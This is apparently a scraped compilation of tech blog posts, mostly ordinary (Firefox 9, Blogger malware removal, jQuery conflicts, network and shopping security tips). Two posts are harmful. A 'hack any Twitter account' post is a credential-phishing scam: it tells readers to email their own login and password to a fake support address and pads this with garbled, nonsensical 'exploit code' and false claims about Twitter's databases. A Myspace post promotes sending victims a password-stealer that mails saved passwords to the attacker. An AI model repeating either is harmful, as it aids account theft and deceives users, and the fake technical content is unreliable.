Firefox 9 is now available for download, with some huge performance improvements. One of the features Firefox 9 has introduced, is the Type Inference, which basically improves the JavaScript performance. This new feature can speed up the browser’s JavaScript performance by up to 30%, and comes with better integration with OS X and lots of stability enhancements. Also, many other stability enhancements and bug fixes have been added to the new version. Firefox 9 is not yet available through the official update channel, but you can easily download it from official Mozilla website.
The new version of Firefox comes with support for font-stretch, improved text-overflow and overall standards support for HTML5. Moreover, Firefox 9 also fixes several other CSS stability issues. It also offers Mac OS X Lion users with the new two-finger swipe navigation, and improved theme integration.

Visual Hashing Adds Incorrect Password Detection In Firefox & Chrome

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Do you often find yourself mistyping your passwords, especially when you’re in a hurry? With Visual Hashing, an extension for Chrome & Firefox, you no longer need to worry about typing wrong passwords. After you’ve installed the add-on, you’ll be able to see a four-color visual hash in every password field, and the hash will change colors as you type. You can think of the hash as being your password’s fingerprint. With time, you’ll remember the colors associated with each password, enabling you to detect mistyped passwords and prevent you from entering wrong ones.
As you type your password, Visual Hashing displays four colored boxes in the password field. These colors change as you type, and at the end, your password gets a specific color combination. So, when ever you mistype a password, you’ll quickly figure it out by detecting a change in the color combination.

This handy extension can find popularity especially with people who are short on time and always in a rush. Visual Hashing is available for both Firefox and Chrome, and can be located at the links below.

How to remove Malware (reported by Chrome) from Blogger in 5 minutes!

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Have Chrome ever reported the existence of malicious software (malware) on your Blogger-powered blog before?

The reason why I posed the above question today is because I’m seeing more and more Blogger-powered blogs that have such warnings reported by Chrome and Chrome happens to be my preferred internet browser of choice. The sight is disturbing but what is more disturbing is the fact that some bloggers didn’t pay much attention to such malware reports! What were they thinking?!

I can give you plenty of reasons why bloggers should pay serious attention to the existence of malicious software (malware) on their blogs but I will only list 3 today.

Malicious software (Malware) makes you lose traffic

Take a good look at the following screenshot. Chrome clearly said that my computer may catch a virus if I visit a blog that is quite popular here in my part of the world. Chrome even provides me with a big ‘Go back’ button so that I can click on it and go back to the last safe zone. Just imagine how many potential visitors the 'infected' blog had lost!

Bad news travel fast!

Yes, bad news does travel very fast and soon people will be talking about the existence of malicious software (malware) on your blog. The news might end up on social networks and soon people might get scared to visit your blog. There goes your blog and your reputation as a blogger down the drain!

Malicious software (Malware) gives you distinct 'recognition', recognized by major search engines

Take a look at the following screenshot. Once you have malicious software (malware) on your blog, failure to remove it in a timely manner will be ‘punished’ severely by major search engines such as Google. Your blog will be labeled harmful and the label is clearly seen in search results pages (SERP). If you are searching for something via Google and stumbles upon search results with such warnings attached, would you go and visit that blog?

Alright! I have given you enough reasons and I hope you are now convinced that malicious software (malware) is not something that should be taken lightly. Now come and learn how to remove malicious software (malware) from your Blogger-powered blog in 5 minutes.

Yes, it is that easy!

How to remove malicious software (malware) from Blogger

Once you saw warnings such as the one shown earlier on Chrome, note down the ‘element’ identified as malicious. In this particular example, the malicious element originates from another blog (nasionalis1946.blogspot.com).

Go back to Chrome and visit your ‘infected’ blog. Quickly view the live page source of your blog and use Chrome’s ‘Find’ tool (hit Ctrl+F) to look for ‘nasionalis1946.blogspot.com’ in your live page source.

Once found, find out how it got there in the first place. See if it is coming from an installed widget or gadget. Based from past experience, most of the time it did came from one! In the example shown down below, the link to that malicious blog is generated after the blogger behind the ‘infected’ blog added it to his or her existing list of blogs in the Blog List gadget.

Thankfully, this is pretty easy to resolve. The blogger behind the ‘infected’ blog can simply edit his Blog List gadget from his or her Blogger Layout dashboard and remove the blog that is causing the ‘infection’ from the list. Everything should be fine after the removal has been made and the new list saved back to Blogger!

There you are! Nasty malware removal for Blogger in just 5 minutes! :)

How to remove or disable Blogger-clickTrap with Google Chrome in 5 minutes!

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Google Chrome is a wonderful internet browser and to experienced bloggers, Chrome is more than just a browser. It has powerful built-in features that can actually help bloggers not only tweak their Blogger templates but also totally design a new one from scratch!

Yes, seriously! Google Chrome can be an extremely powerful WYSIWYG (What You See Is What You Get) Blogger template editor to the hands of experts! Please do not ask me to show you how to do it with Google Chrome since it requires strong knowledge and understanding in Blogger data tags, XML, HTML, XHTML, CSS and of course client-side scripts such as JavaScript.

Today however, I’m going to reveal something that normally bugs bloggers that are using Blogger. It’s the mysterious phenomenon that happens only when bloggers are previewing their Blogger templates or blog posts with their internet browsers, after clicking upon the ‘Preview’ button from their Post or Template editor. The phenomenon completely disables the left-click button and bloggers that are using Blogger could not click (left-click, to be more exact) on links, buttons and etc.

The phenomenon seems to affect the ‘above the fold’ area. Once you scroll down or hit the ‘Pg Dn’ button, the phenomenon disappears for good!

What is causing the mysterious phenomenon?

It is caused by an HTML <div> tag that comes with a class attribute populated with ‘blogger-clickTrap’ value. An example is shown (marked in red) down below.

<div class="blogger-clickTrap" style="position: absolute; top: 0px; left: 0px; width: 100%; height: 100%; z-index: 10; cursor: default; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; opacity: 0.01; background-position: initial initial; background-repeat: initial initial; ">
&nbsp;
</div>

Alright! Come and learn how to disable or remove it with Google Chrome in just 5 minutes!

How to remove or disable Blogger-clickTrap with Google Chrome in 5 minutes!

While you’re still previewing your Blogger template or blog post with Google Chrome, hit the right-click button and select ‘Inspect element’.

Take a look at the new window that just slid into view at the bottom of your screen. By default, selecting ‘Inspect element’ will put the Elements panel into plain view right away. As matter of fact, Google Chrome should have highlighted the HTML <div> tag that we want to remove since the last position of your cursor is right on top of it (blogger-clickTrap)! You can’t miss it! If you missed it somehow, search for that one HTML <div> tag that comes with a class attribute populated with ‘blogger-clickTrap’ value.

Select or highlight the target HTML <div> tag and hit your right-click button. Now you may select ‘Delete node’.

Tada! Congratulations! You have just removed the HTML <div> tag that has been bugging you for quite a while with Google Chrome! But please! Please do not tell Matt Cutts about this! If he got the wind of it, he will send your blog to the last SERP!

Just kidding, folks! :) Removing the HTML <div> tag that comes with a class attribute populated with ‘blogger-clickTrap’ value will not jeopardize your search engine rankings. It won’t affect your Blogger template at all since the HTML <div> tag is a temporary tag created by Blogger and it exists only when you are previewing your Blogger template or blog post online.

There you are! ‘Blogger-clickTrap’ removal with the assistance of Google Chrome in just 5 minutes! :)

How to solve Blogger’s jQuery conflicts with jQuery.noConflict in 5 minutes!

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

When bloggers that are using Blogger have more than one JavaScript library (jQuery, MooTools etc) on their blogs, sometimes they get weird conflicts and sometimes they don’t if they are very lucky!

Yesterday however was not the lucky day for one of my visitors. She had stumbled upon my pure CSS-based emoticons for Blogger tutorial blog post and wanted to have those similar emoticons on her blog. She had perfectly followed my installation instructions but to her dismay, those pure CSS-based (made possible jQuery) emoticons failed to appear on her blog and she came back to me for some answers. Today, I’m going to provide some for her! :)

Why sometimes we get conflicts with our jQuery plug-ins?

Let me quote something from jquery.com:

The jQuery library, and virtually all of its plugins are constrained within the jQuery namespace. As a general rule, "global" objects are stored inside the jQuery namespace as well, so you shouldn't get a clash between jQuery and any other library (like Prototype, MooTools, or YUI).

That said, there is one caveat: By default, jQuery uses "$" as a shortcut for "jQuery"

Yes, the culprit that caused all those weird conflicts is indeed ‘$’!

Thankfully, such conflicts can easily be resolved by calling upon the jQuery.noConflict() method. Let me show you an example.

How to solve Blogger’s jQuery conflicts with jQuery.noConflict

In my pure CSS-based emoticons for Blogger tutorial blog post, the JavaScript code snippet that causes conflicts to one of my visitors is the one shown down below.

<script type='text/javascript'>
$(document).ready(function(){
$(&#39;.post-body, .comments&#39;).emoticonize({
//delay: 500,
//animate: true,
//exclude: &#39;pre, code, .no-emoticons&#39;
});
})
</script>

To solve the conflicts once and for all, just replace the whole code snippet shown earlier with the following down below.

<script>
var $j = jQuery.noConflict();
// Use jQuery via $j(…)
$j(document).ready(function(){
});
</script>

<script type='text/javascript'>
jQuery(document).ready(function(){
jQuery(&#39;.post-body, .comments&#39;).emoticonize({
//delay: 500,
//animate: true,
//exclude: &#39;, pre, code, .no-emoticons&#39;
});
})
</script>

Pay attention to those marked in red and green. The one marked in green is where we call upon the assistance of the jQuery.noConflict() method and it is must be placed right AFTER you call upon your JavaScript libraries (in your Blogger template) and BEFORE the code snippet that is causing the conflicts. The ones marked in red are where we replaced those conflict-making ‘$’(you would understand better after comparing the BEFORE and AFTER versions) with ‘jQuery’.

To my visitor that is having problems with her pure CSS-based emoticons jQuery plug-in, you may now save your Blogger template and enjoy your new emoticons. :)

Even though the examples shown earlier are to help one of my visitors solve conflicts that are caused by her pure CSS-based emoticons jQuery plug-in, the lesson that you have learned here today can also help you resolve conflicts created by other jQuery plug-ins. I strongly recommend bloggers that are fond of using JavaScript libraries (jQuery) on their blogs to read and master other noteworthy techniques that they can also use to resolve conflicts between their jQuery plug-ins and other JavaScript libraries.

Learn How To Hack Any Twitter Account Using A Web Based Exploit

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Do you want to learn how to hack twitter?, Are you looking for a way to hack your friends twitter account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their direct message inbox, steal their username or find a glitch to use a hacking script.In this article I will show you a fairly easy step by step guide on how to hack twitter user accounts without having to directly hack into twitter or their computer and risk getting caught...ignore all those hacking services, twitter hacks and hackers that charge you money for something you can do on your own for free...hack the password of any of your friends accounts and get their password even as a prank or joke.

Hack twitter, hacking twitter passwords from user accounts and find out someones twitter password...Is any of it really possible? Yes it is!. Surely you've heard on the news of how President Obama's twitter got hacked or a few other celebrities. It is all due to twitter's poor coding/programming which causes all those errors like THIS POPULAR ONE.

A couple of month's ago I wanted to check my old Twitter account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a twitter account hacking code or exploit as they are called.

HOW HACKING TWITTER ACCOUNTS WORKS
Twitter has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Twitter uses something similar to an email service to contact their databases.

But as usual, everything isn't as easy as it seems. For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password), luckily for us Twitter is so poorly programmed they also allow you to use a friends/followers account to verify your own (it's a glitch in the "Mutual Friends/Followers" service where they authenticate accounts by checking if the associated friends/followers email is related to the 'victims' account), in other words, if the person you want to get the login information from is following you on Twitter and your following them...you can use your own account to verify theirs (by confusing the database into thinking we are checking if you both mutually follow each other rather than the true act of reseting their password and getting them to send it to us) and get their login email and password sent to you...but the victim must be following you and you them.
HOW TO DO IT

1) First off you will need to get your username and the victims username, how do you do this?

Go to the victims twitter profile and look at your browsers address bar, at the end of all the address you should see something like this: (I have used a red arrow to point it out)

Write it down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the twitter username of the victim and the friend authentication login information. I will give you step by step examples by trying the exploit code of my friend Sarah's account as the victim, see what parts you have to edit and with what:

1. Should be the victims username.
2. Should be your twitter login username to verify your the victims follower/friend.
3. Should be your password so the database can authentic you really are mutually following each other with the victim.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to twittersupport@techie.com which is twitters customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:

$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:

1. The email address of the twitter database's forgotten password customer service.
2. This is where you insert the victims username.
3. This is where you insert the victims gender (as mentioned above the twitter database is devided in a male section and female), put an M inside the quotes if they are a male or a F if they are a female.
5) After you have correctly written the To: and Subject: sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic twitter has that day, this is a sample of the email response you'll receive:

THE EXPLOIT CODE
twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {

function decrypt userID password() {

How to set up a secure network

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Whether it is home or small businesses, setting up a secure network will save you a lot of anxiety and time. There are a lot of advantages in setting up a secure network, for example, you can connect, share and access several electronic gadgets such as, computers, printers, scanners and the like. You have the option of Wireless or Wired networks and it depends on your budget and convenience. This article will guide you to set up your own secure network without having to hire a professional. In a network connection Network security is vital to protect your data. You can either purchase Network security software or download free Network security tools to safe guard your network from intruders.

Planning is important before you start setting up. Fix the location, where you will be placing your equipments. Determine the number of gadgets you would want to connect and also make provisions for any additions in the future. Accordingly purchase the 802.11n router [apart from Wi-Fi it has 4 Ethernet ports], modem, Ethernet cables, connectors and fasteners. In case your gadgets are wi-fi enabled, you can avoid Ethernet cables and set up a wi-fi network.

The next step is to run the cables. Connect the cables between the Ethernet ports of the router and cable/DSL modem. It is a common practice to run the cables either under the floor on the sides of the walls so that they don’t hinder movements. Connect the PCs and other equipments to the router using the Ethernet cables you just laid. Once you are done connect the power to modem and them to router. Let the diagnostics check on modem complete before switching on the router. You can now switch on your computer and test your network connection. If you have been already using internet connection, your system will automatically connect to the internet else you will have to set up as per the instructions of the service provider.

With Ethernet connectivity, your router should automatically start working. However, you will have to install the software supplied to initialize the wireless functions if you are using Wi-fi connectivity.

Protecting your network connection is the most important step of all. You can adjust the settings of the router through its administrative page using a browser by following the instructions in the manual. It is during this stage you will change the SSID and disable SSID broadcast setting. You can also enable the firewall on the wireless router. When it comes to network security, you can find numerous Network security tools available in the market. There are companies that provide free network security software in the internet. Utilize them and protect your network from intrusions.

In case, you find the network jargons difficult, you can choose companies that supply kits according to your needs. While setting up your own network connection is easy, it indeed requires quiet an amount of physical labor. If you are not used to such hard tasks, it is worth hiring professionals who can do the job for you.

Another Dutch CA Hacked?

Gemnet, a subsidiary of KPN (a leading telecommunications and ICT service provider in The Netherlands), has taken its website offline to investigate a possible hack. Hacked websites are not a rarity today, however according to Webwereld the hack is related to CA certificates.
In response to these allegations KPN issued a statement saying that the suggestions that there is a connection between the hack and creation of certificates is true. “The hack of the site has no connection with the issuance and management of Government PKI certificates.
Despite the statement issued by KPN,  a second website belonging to a subsidiary of the telecommunications  company that also issues digital certificates to the Dutch government was also taken down.
According to the original Webwereld article by Brenno de Winter, the attack was launched through a PHP MyAdmin account that didn’t have a password. The attacker then used the database to create files including executable scripts.

How to hack a Myspace account

How to Hack a Myspace Account using Myspace Hacker:

Myspace Hacker is actually a stealer software which searches for all saved passwords on the victim computer. If the victim has checked “Remember Me” while logging in to his Myspace account, then his Myspace password will be saved locally on his computer. All you have to do is to create a server from Myspace Hacker software and send this server to your friend whose you wanna hack Myspace account. When your friend will run the sent server file on his computer, the server will search for all locally stored Myspace account passwords and will send it to your Email account. Thus, you have your friend’s Myspace account password in your inbox and you can now easily hack a Myspace account.

Steps to Hack a Myspace Account:
1. Download Myspace Hacker software to hack a Myspace account.

Password: techotoys.net
2. Run the downloaded Myspace Hacker on your computer:

Wi-Fi Security: Cracking WPA With CPUs, GPUs, And The Cloud

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Is your network safe? Almost all of us prefer the convenience of Wi-Fi over the hassle of a wired connection. But what does that mean for security? Our tests tell the whole story. We go from password cracking on the desktop to hacking in the cloud.
We hear about security breaches with such increasing frequency that it's easy to assume the security world is losing its battle to protect our privacy. The idea that our information is safe is what enables so many online products and services; without it, life online would be so very different than it is today. And yet, there are plenty of examples where someone (or a group of someones) circumvents the security that even large companies put in place, compromising our identities and shaking our confidence to the core.
Zoom
Understandably, then, we're interested in security, and how our behaviors and hardware can help improve it. It's not just the headache of replacing a credit card or choosing a new password when a breach happens that irks us. Rather, it's that feeling of violation when you log into your banking account and discover that someone spent funds out of it all day.
In Harden Up: Can We Break Your Password With Our GPUs?, we took a look at archive security and identified the potential weaknesses of encrypted data on your hard drive. Although the data was useful (and indeed served to scare plenty of people who were previously using insufficient protection on files they really thought were secure), that story was admittedly limited in scope. Most of us don't encrypt the data that we hold dear.
At the same time, most of us are vulnerable in other ways. For example, we don't run on LAN-only networks. We're generally connected to the Internet, and for many enthusiasts, that connectivity is extended wirelessly through our homes and businesses. They say a chain is only as strong as its weakest link. In many cases, that weak link is the password protecting your wireless network.
There is plenty of information online about wireless security. Sorting through it all can be overwhelming. The purpose of this piece is to provide clarification, and then apply our lab's collection of hardware to the task of testing wireless security's strength. We start by breaking WEP and end with distributed WPA cracking in the cloud. By the end, you'll have a much better idea of how secure your Wi-Fi network really is.

10 Tips for Shopping Safely Online

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Whether you’re shopping the holiday sales, or just looking to avoid the craziness at the mall, shopping safely online can be a challenge, especially if you stray from the larger e-tailers to get a better deal from a lesser known site. Here are 10 tips to help you gain some peace of mind while shopping online.

1. Check the seller’s customer satisfaction ratings.

Other people’s experiences with the merchant that you are considering are often an excellent gauge of what to expect when you order. Review other user’s comments and check out the seller’s rating on sites like Google Shopping. Low “star” ratings may provide a red flag that cautions you to find a more reputable seller.

2. Check the Better Business Bureau site to see if there are a large number of complaints about the seller.

The Better Business Bureaus of the United States and Canada are excellent resources to find out specific information about merchants, including whether or not they have any complaints against them related to delivery, product issues, or refund or exchange problems. You can also obtain their business addresses and corporate contact information, which might allow you to circumvent the frontline call center circus of endless automated prompts (i.e. “Press 1 to speak to a semi-live person”).

3. Whenever possible, use a credit card for payment.

According to the American Bar Association’s website, safeshopping.org, it is best to use a credit card when paying online because federal law protects credit card users from fraud and limits individual liability to $50. Some card issuers might even waive the $50 liability fee or pay it for you.

Consider opening a separate account for buying online so your online purchases don’t get lost in the sea of Starbuck’s coffee transactions in your online banking ledger. Also, look into virtual credit cards if your card issuer offers this service. Some card issuers will give you a one-time use virtual card number that you can use for a single transaction if you are concerned about the security of a particular merchant.

4. Never enter your credit card information on a page that is not encrypted.

When using the online checkout process of a seller, always make sure that the web address has “https” instead of “http.” Https ensures that you are using an encrypted communications path to transmit your credit card information to the seller. This helps to ensure against eavesdropping on your transaction.

5. Go directly to the seller’s site rather than clicking a “coupon” link that was sent to you by an
unknown source.

Scammers can often use a tactic called cross-site scripting to craft a hyperlink that appears to be the actual merchant site but actually relays your credit card information to the scammer when you put your payment information into the payment web form. Unless you can verify that a coupon came from the actual vendor’s site to which you have already subscribed, it’s best to avoid random coupons with unknown origins.

6. If you are ordering from a shared computer (i.e. the library, computer lab, or a work PC), log out of the shopping site and clear the browser history, cookies, and page cache.

This seems like a no-brainer, but if you’re using a shared machine, always log out of the store website and clear your browser’s page cache, cookies, and history when you are finished ordering something, or the next guy who sits down at the PC you were using might just have himself a little shopping spree on your dime.

7. Never give your social security number or birthday to any online retailer.

Vendors should never ask you for your social security number unless you are applying for in-store financing or something to that effect. If they are trying to require you to enter a social security number just to order a product, then they are most likely scammers. Run away fast. While your birthday may seem like an innocent enough piece of data to give out, it’s just one more of the three to four data elements needed by a scammer to steal your identity.

8. Find out the seller’s physical address.

If your seller is in a foreign country, returns and exchanges may be difficult or impossible. If the merchant only has a P.O. box listed, then that may be a red flag. If his address is 1234 in a van down by the river, you may consider shopping elsewhere.

9. Check out the seller’s return, refund, exchange, and shipping policies.

Read the fine print and watch out for hidden restocking fees, crazy high shipping charges, and other added fees. Beware of “coupon clubs” that the seller might try to get you to sign up for during your purchase. These clubs may save you a few dollars, but often they involve monthly billing for the privilege of joining.

10. Check the seller’s privacy policy.

While we might not think about it, some sellers resell our personal information, buying preferences, and other data to market research companies, telemarketers, and spammers. Read carefully and always make sure that you are opting-out and not opting-in when asked whether you want to have your information shared with “3rd parties” (unless you like a lot of spam in your e-mail). You may also want to obtain a separate e-mail account to use while shopping online to avoid clogging up your personal e-mail box with the barrage of sale ads and other junk mail that is frequently sent out.

Be smart, be safe, and know that there are groups such as the Internet Crime Complaint Center that can help you if you think you’ve been outright scammed. Check out our other resources below on how to shop smart.

Use 'Run As' To Execute Programs As Administrator

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Security administrators and experts often preach that users should use the least-privileged user account they can, without adversely impacting their productivity, for day-to-day tasks and activities. All-powerful accounts such as the Administrator account in Microsoft Windows should be reserved for only when they are needed.
Part of the reason is so that you don't accidentally access or modify files or system configurations that you shouldn't be. The other part of the reason is that viruses, Trojans and other malware often execute using the access rights and privileges of the account being used. If you are logged in as Administrator, a virus or other malware infection will be able to execute virtually anything with carte blanche on the computer. Logging in as a normal, more restricted user can help secure and protect your system.
However, it can be frustrating to have to log out and log back in as Administrator to install a program or modify a system configuration, and then log out again and log back in as a regular user. Thankfully, Microsoft added a feature called 'Run As' which allows you to run programs using a different username and password than the one currently logged in.

How To Use 'Run As'

If you find that you need to install programs or make changes to the system that require Administrator access, or even if you need to access files or folders of another user but don't want to log out and log back in as that user, you can use the 'Run As' command by following these instructions:
  1. Right-click on the file or program you wish to run. (You can right-click on executable file names in a Windows Explorer window, or you can right-click on programs listed in the Start menu.)
  2. Click the radio button next to "The following user:"
  3. Enter the username of the account you wish to log in as. (You can also click arrow on the drop-down box for a list of available user accounts.)
  4. Enter the password for the account being used.
You do not need to do anything to "turn off" that access. Only the program you execute using 'Run As' will run using the account you choose. Once you exit that program, everything is still just as it was when you started.
